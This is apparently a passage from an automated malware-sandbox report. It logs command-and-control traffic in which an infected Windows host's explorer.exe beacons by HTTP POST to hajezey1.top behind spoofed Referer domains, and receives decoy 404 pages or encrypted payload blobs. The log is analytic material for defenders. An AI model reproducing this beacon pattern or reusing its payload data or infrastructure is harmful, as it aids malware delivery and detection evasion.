                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            12192.168.2.549782185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:31.935556889 CEST1620OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://hxdci.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 332
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:32.020942926 CEST1621INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:31 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            13192.168.2.549786185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:32.476072073 CEST1628OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://uixmltkfi.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 153
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:32.554462910 CEST1629INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:32 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            14192.168.2.549788185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:32.640913010 CEST1631OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://uqqrnpr.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 313
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:32.722615004 CEST1634INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:32 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac ef 3f ef b2 a9 a6 cc b4 02 47 71 f5 66 3c 3d d0 9f cb 67 14 d8 97 24 c8 b9 fc f0 d4 e8 57 2d 88 d5 74 61 b4 7b 69 ad 66 43 80 1c b7 16 db 64 73 98 f5 51 cf 39 c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 07 1d 02 c1 b9 5a 97 82 fd 11 41 a6 b2 84 35 ce 39 83 ce 85 91 3e 94 d4 54 e5 2f 62 a2 22 27 c6 b9 0a d7 d9 1b c5 89 10 ee 8b ba d7 62 47 d8 ae 85 3a 9d 9b e1 d5 f5 de 38 7f 98 92 ff b0 6a 05 8f a5 0a 9f 36 6f 03 62 53 b5 f8 80 99 8b 84 80 3f 1d b8 3a c0 b4 a7 a4 d0 91 46 e8 81 2f 0d 4d 76 00 94 23 94 b6 07 e8 9a 4a 17 7a c5 42 14 7e 24 a0 84 ba 8b 65 7d bb 8e da 3b 33 f2 82 6c 27 b4 e3 e4 ce fd 5f 98 3b c4 fe da 3d 8f f5 3f 78 14 42 7b f9 e8 f0 85 a5 46 e5
                                                            Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|!@+%gt#+xQ<2P0YObyT=a'4 YU\nIXKg[Ge92)g z6@E}Wp0Mk"HI?o|6NI[LeU[0z;+W~5=PVpGZlqV@q!Uvy_:-nD%GkKm@NQ>[J8-w,v"JG0Z"?kQTJMQId%\s$&Q#F<pvA>C/CbGB4VFv2Bbo;6HPgyPum6'NGc_,/DO9W%J}Tzl9\c=~"}h`1%@N!{K.iw]Ai/mv`pV>`|PTZ3z[ ^z&+(l%yw*C=;5"No?hs#9cw9iwN7&,X2wlH%f7-/^'Hg7+w&9c1P0{2%#49FwX?,SC;#vddOU^=i=p.oj"?Gqf<=g$W-ta{ifCdsQ9}p5CPZA59>T/b"'bG:8j6obS?:F/Mv#JzB~$e};3l'_;=?xB{F


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            15192.168.2.549795185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:36.565373898 CEST2178OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ihqsjj.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 118
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:36.643986940 CEST2179INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:36 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            16192.168.2.549796185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:36.725008965 CEST2180OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://civbpqln.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 113
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:36.801302910 CEST2180INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:36 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            17192.168.2.549797185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:36.883522987 CEST2181OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://pqobqf.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 218
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:36.962789059 CEST2182INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:36 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            18192.168.2.549798185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:37.049216986 CEST2185OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://cuuhert.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 127
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:37.130148888 CEST2205INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:37 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 5f 9f 87 cd 29 80 78 51 a1 a2 8f 4c 3d d8 1c e0 32 02 50 08 e8 df e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 e1 8a 20 59 55 11 5c 03 25 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 5d ca cc 8a 44 d8 06 0e 45 67 14 7d 63 fb e0 04 89 f9 d4 57 80 90 70 89 ec 24 4d 6b 0e e1 a2 22 48 32 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 83 97 5f 96 da 19 d1 3a 2d 12 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 7d 87 4a 04 38 cd 78 14 2c de e8 b1 14 c5 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 c2 49 64 cd 25 5c 8d b7 1d 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 a5 32 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6e c9 ae d4 15 95 36 e1 48 50 67 7e 50 b8 81 be e5 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac ef 3f ef b2 a9 a6 cc b4 02 47 71 f5 66 3c 3d d0 9f cb 67 14 d8 97 24 c8 b9 fc f0 d4 e8 57 2d 88 d5 74 61 b4 7b 69 ad 66 43 80 1c b7 16 db 64 73 98 f5 51 cf 39 c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 07 1d 02 c1 b9 5a 97 82 fd 11 41 a6 b2 84 35 ce 39 83 ce 85 91 3e 94 d4 54 e5 2f 62 a2 22 27 c6 b9 0a d7 d9 1b c5 89 10 ee 8b ba d7 62 47 d8 ae 85 3a 9d 9b e1 d5 f5 de 38 7f 98 92 ff b0 6a 05 8f a5 0a 9f 36 6f 03 62 53 b5 f8 80 99 8b 84 80 3f 1d b8 3a c0 b4 a7 a4 d0 91 46 e8 81 2f 0d 4d 76 00 94 23 94 b6 07 e8 9a 4a 17 7a c5 42 14 7e 24 a0 84 ba 8b 65 7d bb 8e da 3b 33 f2 82 6c 27 b4 e3 e4 ce fd 5f 98 3b c4 fe da 3d 8f f5 3f 78 14 42 7b f9 e8 f0 85 a5 46 e5
                                                            Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|!@+%gt_)xQL=2P0YObyT=a'4 YU\%nIXKg[Ge92)g z6]DEg}cWp$Mk"H2I?o|6NI[LeU[0z;+W~5=PVpGZlqV@q!Uvy_:-D%GkKm@NQ>[}J8x,v"JG0Z"?kQTJMQId%\$&Q#F<pvA>C/CbGB24VFv2Bbn6HPg~Pum6'NGc_,/DO9W%J}Tzl9\c=~"}h`1%@N!{K.iw]Ai/mv`pV>`|PTZ3z[ ^z&+(l%yw*C=;5"No?hs#9cw9iwN7&,X2wlH%f7-/^'Hg7+w&9c1P0{2%#49FwX?,SC;#vddOU^=i=p.oj"?Gqf<=g$W-ta{ifCdsQ9}p5CPZA59>T/b"'bG:8j6obS?:F/Mv#JzB~$e};3l'_;=?xB{F


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            19192.168.2.549806185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:40.539868116 CEST7468OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://cpmovtar.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 244
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:40.618438959 CEST7469INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:40 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.549808162.159.133.233443C:\Users\user\AppData\Local\Temp\77DC.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            20192.168.2.549807185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:40.705116987 CEST7470OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://csbokajdc.com/
